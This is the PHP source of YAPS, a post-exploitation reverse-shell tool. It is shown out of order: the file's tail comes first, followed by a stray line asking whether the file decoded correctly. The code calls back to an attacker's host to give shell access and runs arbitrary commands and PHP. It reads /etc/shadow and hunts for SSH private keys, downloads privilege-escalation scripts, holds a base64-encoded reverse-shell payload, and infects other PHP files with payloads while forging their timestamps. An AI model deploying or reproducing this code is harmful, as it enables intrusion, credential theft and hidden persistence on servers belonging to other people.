$position = 1;
if((int)$position === 0) $position = 0;
break;
}
infect($allFiles,$toInfect,(int)$user_payload,$payloads,(int)$position);
return;
}
//list of all writable php files, files to be infected, index of choosen payload, list of payload, position (beginning or end of file)
function infect($allFiles,$fileArr,$payload_index,$payload_list,$position=1){
// 1 = end; 0 = beginning
global $s;
$payload = $payload_list[array_keys($payload_list)[$payload_index]]; //the payload itself
fwrite($s, yellow("
[!] ").white("Files to infect:
"));
foreach($fileArr as $fileToInfect)
fwrite($s,$allFiles[$fileToInfect]."
");
fwrite($s, yellow("[!] ").white("Payload: ").$payload_list[array_keys($payload_list)[$payload_index]]."
");
$position_str = $position ? "End of file" : "Beginnig of file";
fwrite($s, yellow("[!] ").white("Position: ").$position_str."
");
fwrite($s, cyan("[?] ").white("Are you sure you want to infect those files? [Y/n]"));
while($sure = fread($s, 128)){
if(strtolower(substr($sure,0,1)) == "n") return; //not sure, return
break;
}
foreach($fileArr as $fileToInfect){
$filePath = $allFiles[$fileToInfect]; //fileToInfect is an integer that is the index of the array $allFiles
if(isAvailable("file_get_contents") && isAvailable("file_put_contents")){
$old = file_get_contents($filePath);
$originalDate = str_replace("
","",run_cmd("stat ".$filePath.' | grep Modify | sed "s/Modify: //"')); //modify date
if($position) //end of file
$written = file_put_contents($filePath, "
".$payload, FILE_APPEND) ? 1 : 0;
else //beginning of file
$written = file_put_contents($filePath, $payload."
".$old) ? 1 : 0;
$result = $written ? green("[+] ").white($filePath." was infected with payload !") : red("[-] ").white($filePath." Error!");
fwrite($s,$result."
");
if(run_cmd("touch -d ".'"'.$originalDate.'" '.$filePath))
fwrite($s,green("[+] ").white("Mantained original 'modified date' (".$originalDate.").
"));
}
}
return;
}
function parse_stdin($input){
global $s, $color;
switch(substr($input,0,-1)){ // remove newline at end
case "!all-colors":
$color = !$color;
break;
case "!info":
return sysinfo();
break;
case "!enum":
return enum();
break;
case "!suggester":
return suggester();
break;
case "!color":
refresh_ps1(true);
break;
case "!help":
return help();
break;
case "!php":
$phpCode = getPHP();
if($phpCode !== 0){
$result = runPHP($phpCode);
fwrite($s, $result);
}else{
fwrite($s, yellow("[i] Code canceled.").PHP_EOL);
}
break;
case "!stabilize":
stabilize();
break;
case "!backdoor":
backdoor();
break;
case "!passwd":
passwd();
break;
case "!duplicate":
duplicate();
break;
case "!infect":
select_files();
break;
}
}
function cmd_not_found($cmd){
global $s, $commands;
foreach($commands as $valid_cmd){
similar_text($cmd, $valid_cmd, $percentage);
if($percentage > 70){ // if they're similar, suggest correction
fwrite($s, yellow("[!] ")."Command '!$cmd' not found. Did you mean '!".$valid_cmd."'?.
");
return;
}
}
fwrite($s, yellow("[!] ")."Command '!".substr($c,1,-1)."' not found. Use !help.
");
return;
}
function connect(){
global $use_password,$commands,$ps1,$s,$silent;
refresh_ps1(1);
if(!isAvailable('fsockopen')) die(red("[-]")." Function 'fsockopen' isn't available.");
if($use_password)
if(!check_password()) die(fwrite($s,red("[-]")." Wrong password.
")); // guess what
if(!isset($_REQUEST['silent']) && !isset($_REQUEST["s"]) && !$silent) //if not in silent mode
fwrite($s, banner()."
"); //send banner through socket
refresh_ps1();
fwrite($s, "
".$ps1);
while($c = fread($s, 2048)){
$out = '';
if(substr($c,0,1) == "!"){//if starts with "!"
if(in_array(strtolower(substr($c,1,-1)), $commands)) // if the command is valid
$out = parse_stdin($c);
else
cmd_not_found(substr($c,1,-1)); // try to suggest correction
}elseif(substr($c, 0, 3) == 'cd '){
chdir(substr($c, 3, -1)); // since this isn't interactive, use chdir
}elseif(substr($c,0,-1) == "exit"){
fwrite($s, yellow("[i] ")."Closing connection.
");
fclose($s);
die();
}else{
$out = run_cmd(substr($c, 0, -1));
}
if($out === false){
fwrite($s, red('[-] There are no exec functions'));
break;
}
refresh_ps1();
fwrite($s, $out.$ps1);
}
fclose($s);
}
########################## END FUNCTIONS ##########################
if($auto_verify_update) verify_update();
if(isset($_REQUEST['stabilize']) && $_REQUEST['stabilize']){ //stabilized shell was requested
$x = $_POST['x'];
stabilize($x);
}else{ // use normal (not interactive) connection
$s = @fsockopen("tcp://$ip", $port);
if(!$s) die(red("[-] ")."Couldn't connect to socket $ip:$port.");
connect();
}Did this file decode correctly?
Original Code
# YAPS - Yet Another PHP Shell
# Version 1.3.1 - 01/08/21
# Made by Nicholas Ferreira
# https://github.com/Nickguitar/YAPS
//error_reporting(0);
$version = "1.3.1";
set_time_limit(0);
ignore_user_abort(1);
ini_set('max_execution_time', 0);
ini_set('default_socket_timeout', pow(99, 6)); //negative timeout value should set it to infinite, but it doesn't. =(
########################## CONFIGS ############################
$resources = array(
"linpeas" => "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh",
"linenum" => "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh",
"suggester" => "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh",
"verifyUpdateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/version",
"updateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/yaps.php");
$ip = '127.0.0.1';
$port = 7359;
$ps1_color = true; // colored prompt (prettier :)
$color = true; // prompt, banner, info colors (better readability)
$use_password = false; // only allows remote using the shell w/ password
// sha512("vErY_Go0d_$aLt".sha512("password123"))
$salt = 'v_3_r_Y___G_o_0_d___s_4_L_t';
$pass_hash = "f00945860424fa6148e329772c08e7d05d7fab6f69a4722b4c66c164acdb018ecc0cbc62060cc67e7ae962c65ab5967620622cc12206627229b94106b66db6b8"; // default: pass123
$auto_verify_update = false; // if true, will check on every run for update
$silent = false; //if true, does not display banner on connect
if(isset($_GET['vrfy'])) die("baguvix"); //verification
######################### END CONFIGS #########################
$yaps = $_SERVER['SCRIPT_FILENAME'];
// sets reverse socket via $_POST['x'] (stealthier, no IP on apache log request line)
if(isset($_POST['x']) && strpos($_POST['x'], ":") !== false){
$skt = explode(":", $_POST['x']);
$ip = $skt[0];
$port = $skt[1];
}
$banner = cyan('
o o O o--o o-o
\ / / \ | ) (
O o---o O--o o-o
| | | | )
o o o o o--o
Yet Another PHP Shell').'
Version '.$version.'
Coder: Nicholas Ferreira';
########################## PARSE ARGV ########################
$short_args = "u::h::s::";
$long_args = array("update::","help::","silent::");
$options = getopt($short_args, $long_args);
if(isset($options['h']) || isset($options['help'])) die(usage());
if(isset($options['u']) || isset($options['update'])) die(verify_update());
if(isset($options['s']) || isset($options['silent'])) $silent = true;
if(php_sapi_name() == "cli"){ // if yaps is run via cli, parse args
if($argc >= 2 && preg_match("/^[0-9]+$/", $argv[$argc-1])){ // $ php yaps.php 127.0.0.1 4444
$port = $argv[$argc-1];
$ip = $argv[$argc-2];
}else{
foreach($argv as $arg){
if(strpos($arg, ":") !== false){ // if an argument is of the form .*:[0-9]+
$socket = explode(":", $arg);
$ip = $socket[0];
$port = (int)$socket[1];
}
}
}
}
##################### END ARGV PARSING ######################
$commands = array(
"all-colors",
// "backdoor",
"color",
// "download",
"duplicate",
"enum",
"help",
"infect",
"info",
"passwd",
"php",
"stabilize",
"suggester"
// "upload"
);
function green($str){
global $color;
return $color ? "\e[92m".$str."\e[0m" : $str;
}
function red($str){
global $color;
return $color ? "\e[91m".$str."\e[0m" : $str;
}
function yellow($str){
global $color;
return $color ? "\e[93m".$str."\e[0m" : $str;
}
function cyan($str){
global $color;
return $color ? "\e[96m".$str."\e[0m" : $str;
}
function white($str){
global $color;
return $color ? "\e[97m".$str."\e[0m" : $str;
}
function banner(){
global $banner;
return $banner.white('
This is ').red('NOT').white(' an interactive shell.
Use ').green('!help').white(' to see commands.');
}
function usage(){
global $banner,$version;
return $banner.'
'.yellow('Usage:').white('
There are three ways you can start the connection:
').green('1. Via command line in the compromised host;').'
E.g: $ php yaps.php [options] [ip port|ip:port]
'.green('2. Making a POST request to the file with the parameter "x";').'
E.g: $ curl -X POST -d "x=192.168.73.59:7359" hacked.com/uploads/yaps.php
'.green('3. Making a GET request without parameters (will connect to the hardcoded socket);').'
E.g: $ curl hacked.com/uploads/yaps.php
'.yellow('Options:').white('
-h, --help: Show this help
-s, --silent: Silent mode (does not display banner)
-u, --update: Check if YAPS is up to date
').yellow('Examples (suppose your IP is 192.168.73.59):').'
infected@host:~$ php yaps.php -s 192.168.73.59 4444
infected@host:~$ php yaps.php 192.168.73.59:8080
your@machine:~$ curl -X POST -d "x=192.168.73.59" hacked.com/uploads/yaps.php
';
}
function isAvailable($function){
$dis = ini_get('disable_functions');
if(!empty($dis)){
$dis = preg_replace('/[, ]+/', ',', $dis);
$dis = explode(',', $dis); // split by comma
$dis = array_map('trim', $dis); //remove whitespace at the beginning and end
}else{
$dis = array();
}
if(is_callable($function) and !in_array($function, $dis))
return true;
return false;
}
function help(){
$help = '
'.green('Useful commands:').'
'.cyan('!help').'
Display this menu
'.cyan('!all-colors').'
Toggle all colors (locally only)
'.cyan('!color').'
Toggle $PS1 color (locally only)
'.cyan('!duplicate').'
Spawn another reverse shell
'.cyan('!enum').'
Download Linpeas and Linenum to /tmp and get it ready to run
'.cyan('!infect').'
Inject payloads into PHP files
'.cyan('!info').'
List information about target
'./*cyan('!download <target file>').'
Downloads file from target to your PC
'.cyan('!upload <source> <destination>').'
Uploads a source file from your PC to target destination folder
'.*/cyan('!passwd').'
Show options for password
'.cyan('!php').'
Write and run PHP code on the remote host
'.cyan('!stabilize').'
Stabilize to an interactive shell
'.cyan('!suggester').'
Download Linux Exploit Suggester to /tmp and get it ready to run
'.green('Command line options:').'
'.white('$ php yaps.php [--update|-u]').'
Check if YAPS is up to date
'.white('$ php yaps.php ip port').'
Connect to ip:port
';
return $help;
}
function run_cmd($c){ // modified from msf
$c = $c." 2>&1\n"; // stderr to stdout
if(isAvailable('exec')){
$stdout = array();
exec($c, $stdout);
$stdout = join(chr(10),$stdout).chr(10);
}else if(isAvailable('shell_exec')){
$stdout = shell_exec($c);
}else if(isAvailable('popen')){
$fp = popen($c, 'r');
$stdout = NULL;
if(is_resource($fp))
while (!feof($fp))
$stdout .= fread($fp, 1024);
@pclose($fp);
}else if(isAvailable('passthru')){
ob_start();
passthru($c);
$stdout = ob_get_contents();
ob_end_clean();
}else if(isAvailable('proc_open')){
$handle = proc_open($c, array(
array('pipe','r') ,
array('pipe','w') ,
array('pipe','w')
) , $pipes);
$stdout = NULL;
while (!feof($pipes[1]))
$stdout .= fread($pipes[1], 1024);
@proc_close($handle);
}else if(isAvailable('system')){
ob_start();
system($c);
$stdout = ob_get_contents();
ob_end_clean();
}else{
$stdout = 0;
}
return $stdout;
}
$ps1 = "[YAPS] ".str_replace(PHP_EOL,"",green(run_cmd("whoami")."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$
function sysinfo(){
global $s;
fwrite($s,green("\n====================== Initial info ======================\n\n"));
$info = cyan("[i] OS info:\n").run_cmd("lsb_release -a | grep -v 'No LSB'").PHP_EOL;
$info .= cyan("[i] Hostname: ").run_cmd("hostname");
$info .= cyan("[i] Kernel: ").run_cmd("uname -a");
$info .= cyan("[i] CPU: \n").run_cmd("cat /proc/cpuinfo | grep -i 'model name' | cut -d':' -f 2 | sed 's/^ *//g'");
$info .= cyan("[i] RAM: \n").run_cmd("cat /proc/meminfo | egrep -i '(memtotal|memfree)'");
$info .= cyan("[i] Sudo version: ").run_cmd("sudo --version | grep 'Sudo version' | cut -d' ' -f 3");
$info .= cyan("[i] User/groups: ").run_cmd("id").PHP_EOL;
$info .= cyan("[i] Active TTY: \n").run_cmd("w").PHP_EOL;
fwrite($s, $info);
fwrite($s,green("====================== Users info ======================\n\n"));
$info = cyan("[i] Current user: ").run_cmd("whoami");
$info .= cyan("[i] Users in /home: \n").run_cmd("ls /home").PHP_EOL;
$info .= cyan("[i] Crontab of current user: \n").run_cmd("crontab -l | egrep -v '^#'").PHP_EOL;
$info .= cyan("[i] Crontab: \n").run_cmd("cat /etc/crontab | egrep -v '^#'").PHP_EOL;
fwrite($s, $info);
fwrite($s,green("====================== All users ======================\n\n"));
fwrite($s, run_cmd("cat /etc/passwd").PHP_EOL);
if(is_readable("/etc/shadow"))
fwrite($s, red("[!] /etc/shadow is readable!\n").run_cmd("cat /etc/shadow").PHP_EOL);
fwrite($s, green("====================== Net info ======================\n\n"));
$info = cyan("[i] IP Info: \n").run_cmd("ifconfig").PHP_EOL;
$info .= cyan("[i] Hosts: \n").run_cmd("cat /etc/hosts | grep -v '^#'").PHP_EOL; // /etc/hosts file
$info .= cyan("[i] Interfaces/routes: \n").run_cmd("cat /etc/networks && route").PHP_EOL;
$info .= cyan("[i] IP Tables rules: \n").run_cmd("(iptables --list-rules 2>/dev/null)").PHP_EOL;
$info .= cyan("[i] Active ports: \n").run_cmd("(netstat -punta) 2>/dev/null").PHP_EOL; //established, listening, 0.0.0.0, 127.0.0.1
fwrite($s, $info);
fwrite($s, green("====================== Interesting binaries ======================\n\n"));
$interesting_binaries = array('nc','nc.traditional','ncat','nmap','perl','python','python2','python2.6','python2.7','python3','python3.6','python3.7','ruby','node','gcc','g++','docker','php');
foreach($interesting_binaries as $binary) {
$binary = shell_exec("which $binary 2>/dev/null");
if($binary !== "" && base64_encode($binary.PHP_EOL) !== "Cg==") // if not empty or newline
fwrite($s, run_cmd("ls -l $binary"));
}
fwrite($s, green("\n====================== SUID binaries ======================\n\n"));
$suid_list = explode("\n",shell_exec("find / -type f -perm /4000 2>/dev/null"));
foreach($suid_list as $suid)
if($suid !== "")
fwrite($s, run_cmd("ls -l $suid"));
fwrite($s, green("\n====================== SSH files ======================\n\n"));
$authorized_keys = explode("\n",shell_exec("find / -type f -name authorized_keys 2>/dev/null")); // search for authorized_keys file
foreach($authorized_keys as $public_key)
if(is_writable($public_key))
fwrite($s, red("[Writable] ").$public_key.PHP_EOL);
else
fwrite($s, $public_key.PHP_EOL);
$id_rsa = explode("\n",shell_exec("find / -type f -name id_rsa 2>/dev/null")); // search for id_rsa files
foreach($id_rsa as $priv_key)
if(is_readable($priv_key))
fwrite($s, red("[Readable] ").$priv_key.PHP_EOL);
else
fwrite($s, $priv_key.PHP_EOL);
fwrite($s, green("\n=================== Writable PHP files ===================\n\n"));
$webfiles_arr = array();
$webdir = array('/var/www','/srv','/usr/local/apache2','/var/apache2','/var/www/nginx-default');
foreach($webdir as $dir)
$webfiles_arr = array_merge($webfiles_arr, explode("\n", shell_exec("find ".$dir." -type f -name '*.php*' -writable 2>/dev/null")));
if(count($webfiles_arr) > 25){
for($i=0;$i<25;$i++)
if($webfiles_arr[$i] !== "")
fwrite($s, red("[Writable] ").$webfiles_arr[$i].PHP_EOL);
fwrite($s, "...\n...".PHP_EOL);
fwrite($s, green("[+] "). "Showing only the first 25 files. There are more!".PHP_EOL);
}else{
foreach($webfiles_arr as $file)
if($file !== "")
fwrite($s, red("[Writable] ").$file.PHP_EOL);
}
fwrite($s, cyan("\n[i]")." Get more information with !enum.".PHP_EOL);
}
function random_name($name = ""){
$charset = implode("",array_merge(range("A", "Z"), range("a","z"), range(0,9))); // merge arrays and join them into a string
for($i=0;$i<=mt_rand(5,6);$i++)
$name .= $charset[mt_rand(0,strlen($charset)-1)];
return $name;
}
function download($url, $saveTo){ //download file from $url to $saveTo
$randomName = random_name();
$content = get_request($url);
if(isAvailable('file_put_contents'))
if(file_put_contents($saveTo."/".$randomName,$content)) return $randomName;
if(isAvailable('fopen') && isAvailable('fwrite') && isAvailable('fclose')){
$fp = fopen($saveTo."/".$randomName, "w");
if(fwrite($fp, $content)){
fclose($fp);
return $randomName;
}
}
return false;
}
function enum(){ //download linpeas, save to /tmp and change its permission to 777
global $s, $resources;
$downloadLinpeas = download($resources["linpeas"], "/tmp/");
$downloadLinenum = download($resources["linenum"], "/tmp");
if($downloadLinpeas){
fwrite($s, green("[+]")." Linpeas saved to /tmp/".$downloadLinpeas.cyan("\n[i] Changing permissions...\n"));
if(chmod("/tmp/".$downloadLinpeas, 777))
fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$downloadLinpeas." | tee /tmp/linpeas.log\n\n"));
else
fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$downloadLinpeas."\n\n"));
}
if($downloadLinenum){
fwrite($s, green("[+] Linenum saved to /tmp/".$downloadLinenum).cyan("\n[i] Changing permissions...\n"));
if(chmod("/tmp/".$downloadLinenum, 777))
fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$downloadLinenum." | tee /tmp/linenum.log\n"));
else
fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$downloadLinenum."\n"));
}
}
function suggester(){//download linux exploit suggester, save to /tmp and change its permission to 777
global $s, $resources;
$download = download($resources["suggester"], "/tmp/");
if($download){
fwrite($s, green("[+]")." Linux Exploit Suggester saved to /tmp/".$download.cyan("\n[i]")." Changing permissions...\n");
if(chmod("/tmp/".$download, 777))
fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$download." | tee /tmp/LES.log\n"));
else
fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$download."\n"));
}
return;
}
function refresh_ps1($changecolor=false){ //build a nice PS1, toggle between colored and not colored
global $ps1_color,$ps1;
$user = str_replace(PHP_EOL, "", run_cmd("whoami"));
if(!$ps1_color){
$ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",green($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$
if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",red($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."# "); // root@hostname:~#
if($changecolor) $ps1_color = true;
}else{
$ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."$ "); // user@hostname:~$
if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."# "); // root@hostname:~#
if($changecolor) $ps1_color = false;
}
}
function getPHP(){ //receive PHP code via socket
global $s;
$php = '';
fwrite($s, cyan("[*]")." Write your PHP code (*without* PHP tags). To send and run it, use ".green("!php").". ".yellow("\n[i] Note that this is NOT an interactive PHP shell. Max input: 4096 bytes.").white("\nphp> "));
while($c = fread($s, 4096)){
if(substr($c,0,-1) == "!php") // remove newline at end
return $php;
if(substr($c,0,-1) == "!cancel") // remove newline at end
return 0;
fwrite($s, white("php> ")); //prompt
$php .= $c; // append received line to the whole php code to be executed
}
return $php;
}
function runPHP($code){ // guess what
try{
ob_start();
eval($code); // do the magic
$result = ob_get_contents(); //get buffer from eval() to return later
ob_end_clean();
}catch (Throwable $ex){
$err = explode("Stack trace:", $ex);
$result = $err[0]; //return the error
}
return $result;
}
function stabilize($post_socket=""){ // spawn an interactive shell
global $s, $port, $ip;
$payload = "JHNjcmlwdD1zaGVsbF9leGVjKCJ3aGljaCBzY3JpcHQiKTskcHkzPXNoZWxsX2V4ZWMoIndoaWNoIHB5dGhvbjMiKTskcHk9c2hlbGxfZXhlYygid2hpY2ggcHl0aG9uIik7aWYoc3RybGVuKCRzY3JpcHQpPjYgJiYgc3RycG9zKCRzY3JpcHQsIm5vdCBmb3VuZCIpPT1mYWxzZSkgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCAtY2kgJyIuJHNjcmlwdC4iIC1xYyAvYmluL2Jhc2ggL2Rldi9udWxsJyI7ZWxzZSBpZihzdHJsZW4oJHB5Myk+NyAmJiBzdHJwb3MoJHNjcmlwdCwibm90IGZvdW5kIik9PWZhbHNlKSAkc3RhYmlsaXplcj0kcHkzLiIgLWMgJ2ltcG9ydCBwdHk7cHR5LnNwYXduKFwiL2Jpbi9iYXNoXCIpJyI7ZWxzZSBpZihzdHJsZW4oJHB5KT42ICYmIHN0cnBvcygkc2NyaXB0LCJub3QgZm91bmQiKT09ZmFsc2UpICRzdGFiaWxpemVyPSRweS4iIC1jICdpbXBvcnQgcHR5O3B0eS5zcGF3bihcIi9iaW4vYmFzaFwiKSciO2Vsc2UgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCI7JHN0YWJpbGl6ZXI9c3RyX3JlcGxhY2UoIlxuIiwiIiwkc3RhYmlsaXplcik7JHNoZWxsPSJ1bmFtZSAtYTskc3RhYmlsaXplciI7dW1hc2soMCk7JHNvY2s9ZnNvY2tvcGVuKCJJUF9BRERSIixQT1JULCRlcnJubywkZXJyc3RyLDMwKTskc3RkPWFycmF5KCAwID0+IGFycmF5KCJwaXBlIiwiciIpLDEgPT4gYXJyYXkoInBpcGUiLCJ3IiksMiA9PiBhcnJheSgicGlwZSIsInciKSApOyRwcm9jZXNzPXByb2Nfb3Blbigkc2hlbGwsJHN0ZCwkcGlwZXMpO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoIWZlb2YoJHNvY2spKXskcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pO2lmKGluX2FycmF5KCRzb2NrLCRyZWFkX2EpKSBmd3JpdGUoJHBpcGVzWzBdLGZyZWFkKCRzb2NrLDIwNDgpKTtpZihpbl9hcnJheSgkcGlwZXNbMV0sJHJlYWRfYSkpIGZ3cml0ZSgkc29jayxmcmVhZCgkcGlwZXNbMV0sMjA0OCkpO2lmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSkgZndyaXRlKCRzb2NrLGZyZWFkKCRwaXBlc1syXSwyMDQ4KSk7fSBmY2xvc2UoJHNvY2spO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBmY2xvc2UoJHApO3Byb2NfY2xvc2UoJHByb2Nlc3MpOw==";// modified php-reverse-shell (works w/ sudo, mysql, ftp, su, etc.)
if(strlen($post_socket) > 1 && strlen($post_socket) > 0){ //if is set
echo $post_socket;
$skt = explode(":", $post_socket);
$post_ip = $skt[0];
$post_port = $skt[1];
$final_payload = base64_encode(str_replace("IP_ADDR", $post_ip, str_replace("PORT", $post_port, base64_decode($payload)))); // changes payload to add correct socket
shell_exec("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);'");
return;
}
fwrite($s, yellow("[i]")." Set up a listener on another port (nc -lnvp <port>) and press ENTER.\nChoose a port: ");
while($c = fread($s, 8)){ //reads [ENTER]
if(strlen($c) > 0){ // got [ENTER]
$recv_port = (int)$c; // get the integer part
if($recv_port>65535 || $recv_port==0){
fwrite($s,red("[-]")." Port must be between 0-65535.\nChoose another port: ");
}else{
$final_payload = base64_encode(str_replace("IP_ADDR", $ip, str_replace("PORT", $recv_port, base64_decode($payload)))); // changes payload to add correct socket
fwrite($s, yellow("[i]")." Trying to connect to $ip:$recv_port\n");
if(isAvailable("popen") && isAvailable("pclose")){
pclose(popen("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);' &",'r')); // does the magic
return;
}
// in case we don't have popen or pclose
$curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php
run_cmd("timeout --kill-after 0 1 wget --post-data=\"x=$ip:$recv_port&stabilize=1\" $curl_url > /dev/null"); // thx znttfox =)
return;
}
}
}
}
function backdoor(){
// todo
}
function check_password(){ //ask for password and return 0 or 1
global $s, $pass_hash, $salt;
fwrite($s, yellow("[i] ")."This shell is protected. \nEnter the password: ");
while($data = fread($s,1024)){
$entered_pass = substr($data,0,-1); //remove newline at end
return hash("sha512", $salt.hash("sha512",$entered_pass, false), false) == $pass_hash ? true : false;
}
}
function change_password($new){
global $salt, $yaps, $s;
$new_hash = hash("sha512", $salt.hash("sha512",$new, false), false);
if(!is_readable($yaps) || !is_writable($yaps)) return false; //someone changed the permission
$yaps_code = file_get_contents($yaps);
$new_yaps_code = preg_replace('/[a-f0-9]{128}/', $new_hash, $yaps_code, 1); // the password hash is be the first thing this regex should match
if(file_put_contents($yaps, $new_yaps_code)){
fwrite($s, green("[+] ")."Password changed. Changes will take effect on next connection.\n");
return true;
}else{
fwrite($s, red("[-] ")."Couldn't read or write the file. Are the permissions right?\n" . run_cmd("ls -l ".$yaps."\n"));
return false;
}
}
function toggle_password(){
global $use_password, $s, $yaps;
$yaps_code = file_get_contents($yaps);
if($use_password){ //password currently active
$new_yaps_code = preg_replace('/(\$use_password += +)(true)/', '$1false', $yaps_code, 1);
if(file_put_contents($yaps, $new_yaps_code)){
$use_password = false;
fwrite($s, green("[+] ")."Password deactivated.\n");
return true;
}
fwrite($s, red("[-] ")."Couldn't deactivate password.\n");
return false;
}
// will enter here if $use_password is false
$new_yaps_code = preg_replace('/(\$use_password += +)(false)/', '$1true', $yaps_code, 1); //limit must be 1
if(file_put_contents($yaps, $new_yaps_code)){
$use_password = false; // if limit isn't 1, this will be changed to false too
fwrite($s, green("[+] ")."Password activated.\n");
return true;
}
fwrite($s, red("[-] ")."Couldn't activate password.\n");
return false;
}
function passwd(){
global $s,$use_password;
if($use_password){
if(!check_password()){
fwrite($s, red("[-] ")." Wrong password\n");
return;
}
fwrite($s, green("[+] Password is enabled. ").white("Choose an option:")."\n[1] Change password\n[2] Disable password\n[3] Cancel\n> ");
while($data = fread($s, 8)){
switch(substr($data, 0, -1)){
case "1": // change password
fwrite($s,cyan("[*] ")."Choose the new password: ");
while($data2 = fread($s, 1024)){
$newPass = substr($data2, 0, -1); //remove newline at end
change_password($newPass);
return;
}
break;
case "2": // disable password
toggle_password();
return;
break;
default:
fwrite($s, cyan("[*] ")."Canceled.\n");
return;
break;
}
}
}else{ // no password required
fwrite($s, yellow("[!] Password is disabled. ").white("Choose an option:")."\n[1] Set a password\n[2] Enable password\n[3] Cancel\n> ");
while($data = fread($s, 8)){
switch(substr($data, 0, -1)){
case "1": // set a new password
fwrite($s,cyan("[*] ")."Choose the new password: ");
while($data2 = fread($s, 1024)){
$newPass = substr($data2, 0, -1); //remove newline at end
change_password($newPass);
return;
}
break;
case "2": // enable password
toggle_password();
return;
break;
default:
fwrite($s, cyan("[*] ")."Canceled.\n");
return;
break;
}
}
}
}
function duplicate(){
global $s,$ip,$port,$_SERVER;
if(!isset($_SERVER["REQUEST_SCHEME"]) || !isset($_SERVER["HTTP_HOST"]) || !isset($_SERVER["REQUEST_URI"])){
fwrite($s, yellow("[-] ")."Couldn't find YAPS URL. Did you run me via command line?\nPlease provide the correct YAPS URL (example.com/files/yaps.php): ");
while($yaps_url = fread($s, 256)){
if(get_request(preg_replace("/\n/", "",$yaps_url."?vrfy")) !== "baguvix")
return fwrite($s, red("[-] ")."Couldn't validade YAPS URL. Is this the correct URL?\n");
break;
}
$curl_url = $yaps_url;
}else{
$curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php
echo $curl_url;
}
fwrite($s, cyan("[*] ")."Choose a port to listen (default: $port): ");
while($new_port = fread($s, 32)){
$new_port = (base64_encode($new_port) == "Cg==") ? $port: substr($new_port,0,-1); //if new_port= newline, new_port = old port
$socket = array('x' => $ip.":".$new_port);
fwrite($s, "Connecting to ".$ip.":".$new_port."\n");
$cmd = "wget -qO- --post-data=\"".http_build_query($socket)."\" $curl_url > /dev/null";
if(isAvailable("popen") && isAvailable("pclose"))
pclose(popen($cmd." &",'r')); // doesn't wait for wget to return
else
run_cmd("timeout --kill-after 0 1 ".$cmd); // thx znttfox =)
return;
}
}
function get_request($url){ //todo: change download function
$response = false;
if(isAvailable("file_get_contents")){
$response = file_get_contents($url);
}elseif(isAvailable("fread") && isAvailable("fopen") && ini_get("allow_url_fopen")){
$response = fread(fopen($url, "r"),10);
}elseif(in_array("curl",get_loaded_extensions())){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
}elseif($tmp_curl = run_cmd("curl -s ".$url)){
$response = $tmp_curl;
}elseif($tmp_wget = run_cmd("wget -qO- ".$url)){
$response = $tmp_wget;
}
return $response;
}
function verify_update(){
global $version, $resources;
$newest_version = 0;
echo cyan("[i] ")."Your version: $version. Checking for updates...\n";
$request = get_request($resources["verifyUpdateURL"]);
if($request) $newest_version = $request;
$newest_version_ = (int)str_replace(".","",$newest_version); //get only numbers
$version_ = (int)str_replace(".","",$version);
if($newest_version_ !== 0 && $newest_version_ > $version_){
echo red("[i]")." Your version is not up to date.\n".green("[DOWNLOAD v".str_replace("\n","",$newest_version)."]: ").$resources["updateURL"]."\n";
return;
}
echo green("[+] ")."YAPS is already up to date (v$version)!\n";
return;
}
function getFiles($dir){ // return writable php files on webserver root
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); //list recursively
$list = array();
foreach($iterator as $file)
if(!is_dir($file) && is_writable($file)) //list only writable files
if($file->getPathName() !== $_SERVER["SCRIPT_FILENAME"]) //remove myself from list
if(substr($file->getPathName(),-4) == ".php") //list only php files
array_push($list,$file->getPathName());
sort($list);
return $list;
}
function select_files(){
global $s;
$webdir = array('/var/www/','/srv/','/usr/local/apache2/','/var/apache2/','/var/www/nginx-default/');
$webfiles_arr = array();
foreach($webdir as $dir)
try{
$list = getFiles($dir);
$webfiles_arr = array_merge($webfiles_arr,$list);
}catch(Exception $e){}
